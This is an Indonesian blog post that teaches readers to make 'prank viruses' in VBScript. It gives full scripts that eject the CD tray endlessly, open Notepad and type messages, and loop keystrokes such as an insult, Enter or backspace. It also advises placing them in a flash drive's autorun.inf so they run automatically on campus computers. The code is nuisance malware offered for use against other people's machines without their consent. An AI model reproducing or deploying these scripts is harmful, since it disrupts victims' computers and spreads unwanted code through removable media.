Selamat datang, Pengunjung! Mendaftar Langganan RSS Admin

.

sekarang hari Kamis
Main » 2012 » januari » 15 » Cara Mudah dan Sederhana Membuat Virus Jahil
10:12 PM
Cara Mudah dan Sederhana Membuat Virus Jahil

cartoon virus germ bacteria thumb3234482 Cara Mudah dan Sederhana Membuat Virus Jahil

Tips tentang Cara membuat virus jahil. Ini dia nih buat anda2 yang pngen ngerjain temen bisa pake cara ini. yaitu dengan pakai virus komputer jahil. Virusnya ga berbahaya kok gan, ga ngrusak file dan sistem tapi cuma bkin orang bingung, BT dan Kesel aja,,,heheh! cara membuat virusnya sangat mudah sekali,,,saya jamin. Langsung saja ya,,,

ini dia Cara Mudah dan Sederhana Membuat Virus Jahil :

Caranya: Buka notepad dan masukkan code berikut,

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Simpanlah dengan file tadi dengan ekstensi file iseng.vbs ato apapun nama kesukaan asalkan pastikan ekstensinya .vbs, dan jalankan filenya ( Klik 2x), perhatikan CD/DVD ROM akan terbuka/tertutup dengan sendirinya tanpa henti.

Salah satu cara menghentikan aksi Virus Nakal ini ialah dengan menekan tombol CRTL+ALT+DEL dan matikan proses wscripts.exe, Kalo mau keren lagi, masukkan ke file autorun.inf di flashdisk anda, jadi setiap loe colokin ke kompie kampus, maka akan otomatis dijalankan "Virus” Nakal ini.

NB: kl males atau ga tau cara copasnya. download ajah linknya diakhir artikel.

 

Nah mau script .vbs yang laen lagi?

WScript.Sleep 18000
WScript.Sleep 1000
do
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "H"
WScript.Sleep 500
WshShell.SendKeys "a"
WScript.Sleep 500
WshShell.SendKeys "l"
WScript.Sleep 500
WshShell.SendKeys "o"
WScript.Sleep 500
WshShell.SendKeys ". "
WScript.Sleep 500
WshShell.SendKeys "a"
WScript.Sleep 500
WshShell.SendKeys "p"
WScript.Sleep 500
WshShell.SendKeys "a"
WScript.Sleep 500
WshShell.SendKeys " "
WScript.Sleep 500
WshShell.SendKeys "k"
WScript.Sleep 500
WshShell.SendKeys "a"
WScript.Sleep 500
WshShell.SendKeys "b"
WScript.Sleep 500
WshShell.SendKeys "a"
WScript.Sleep 500
WshShell.SendKeys "r"
WScript.Sleep 500
WshShell.SendKeys "?"
WScript.Sleep 500
WshShell.SendKeys " "
WScript.Sleep 500
WshShell.SendKeys "K"
WScript.Sleep 500
WshShell.SendKeys "a"
WScript.Sleep 500
WshShell.SendKeys "b"
WScript.Sleep 500
WshShell.SendKeys "a"
WScript.Sleep 500
WshShell.SendKeys "r"
WScript.Sleep 500
WshShell.SendKeys " "
WScript.Sleep 500
WshShell.SendKeys "b"
WScript.Sleep 500
WshShell.SendKeys "a"
WScript.Sleep 500
WshShell.SendKeys "i"
WScript.Sleep 500
WshShell.SendKeys "k"
WScript.Sleep 500
WshShell.SendKeys "?"
WScript.Sleep 500
wscript.sleep 5000
loop

Scripts diatas nanti otomatis buka notepad dan ketik: Halo. apa kabar? kabar baik?

ingat yah simpan dengan ekstensi nama .vbs, klik file–>save as

 

Kode Vbs ini akan membuat user terus mengetikkan kata2 "Kamu emang jelek koq!” icon biggrin Cara Mudah dan Sederhana Membuat Virus Jahil

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "Kamu emang jelak koq!"
loop

Dan membuat terus menerus menekan tombol "Enter”

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Terus tekan backspace:

MsgBox "Balik lagi ah...saltik"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

 

Untuk download script virusnya ada disini

Nah, gimana ga? langsung saja dipraktekin buat jahilin temen,,,hehehe

Semoga Cara Mudah dan Sederhana Membuat Virus Jahil di atas bermanfaat bagi anda semua,,,,

Views: 204 | Added by: Mp2skill | Tags: tips and trik, gratis buat virus, Cara Mudah dan Sederhana Membuat Vi | Rating: 5.0/1
Total comments: 0
Only registered users can add comments.
[ Registration | Login ]